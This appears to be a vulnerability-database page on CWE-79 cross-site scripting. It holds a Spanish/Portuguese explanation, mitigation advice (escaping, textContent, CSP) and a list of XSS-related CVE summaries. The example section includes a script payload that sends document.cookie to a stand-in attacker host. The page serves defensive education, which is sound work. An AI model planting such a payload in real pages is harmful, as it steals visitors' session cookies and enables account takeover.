Fallos del tipo CWE-79

29.057 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-25166MEDIUMCross Site Scripting vulnerability in 71CMS v.1.0.0 allows a remote attacker to execute arbitrary code via the uploadfile action parameter iEPSS 0.5%CVE-2022-29096MEDIUMDell Wyse Management Suite 3.6.1 and below contains a Reflected Cross-Site Scripting Vulnerability in saveGroupConfigurations page. An autheEPSS 0.5%CVE-2023-1743LOWSourceCodester Grade Point Average GPA Calculator index.php cross site scriptingEPSS 0.5%CVE-2023-3885LOWCampcodes Beauty Salon Management System edit_category.php cross site scriptingEPSS 0.5%CVE-2023-2565LOWSourceCodester Multi Language Hotel Management Software POST Parameter ajax.php cross site scriptingEPSS 0.5%CVE-2023-2864LOWSourceCodester Online Jewelry Store POST Parameter customer.php cross site scriptingEPSS 0.5%CVE-2022-46603MEDIUMAn issue in Inkdrop v5.4.1 allows attackers to execute arbitrary commands via uploading a crafted markdown file.EPSS 0.5%CVE-2023-1771LOWSourceCodester Grade Point Average GPA Calculator Master.php get_scale cross site scriptingEPSS 0.5%CVE-2022-35933MEDIUMPrestaShop module Product Comments vulnerable to cross-site scripting (XSS)EPSS 0.5%CVE-2023-1686LOWSourceCodester Young Entrepreneur E-Negosyo System GET Parameter index.php cross site scriptingEPSS 0.5%CVE-2019-25086LOWIET-OU Open Media Player timedtext.php webvtt cross site scriptingEPSS 0.5%CVE-2022-38114MEDIUMClient-Side Desync Vulnerability EPSS 0.5%CVE-2021-25964MEDIUMStored Cross-Site Scripting (XSS) in Calibre-web via Description Field in MetadataEPSS 0.5%CVE-2024-1536HIGHEssential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 5.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Event CalendarEPSS 0.5%CVE-2026-54165MEDIUMStored DOM-XSS in public shared-folder image gallery (one-click, unauthenticated victim)EPSS 0.5%CVE-2026-78000MEDIUMJoomla Extension - j2commerce.com - Open redirect in cart controller in J2Store 1.0.0-3.3.20, 4.0.0-4.0.20, 4.1.0-4.1.5EPSS 0.5%CVE-2023-1485LOWSourceCodester Young Entrepreneur E-Negosyo System GET Parameter index.php cross site scriptingEPSS 0.5%CVE-2023-28800HIGHOutput encoding missing in redrurl parameterEPSS 0.5%CVE-2015-10028LOWss15-this-is-sparta Main Page roomElement.js cross site scriptingEPSS 0.5%CVE-2022-45472MEDIUMCAE LearningSpace Enterprise (with Intuity License) image 267r patch 639 allows DOM XSS, related to ontouchmove and onpointerup.EPSS 0.5%